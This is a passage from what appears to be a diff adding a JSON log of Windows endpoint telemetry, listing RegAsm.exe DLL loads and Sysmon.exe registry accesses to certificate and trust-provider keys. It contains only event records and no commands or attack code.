"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570863869984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 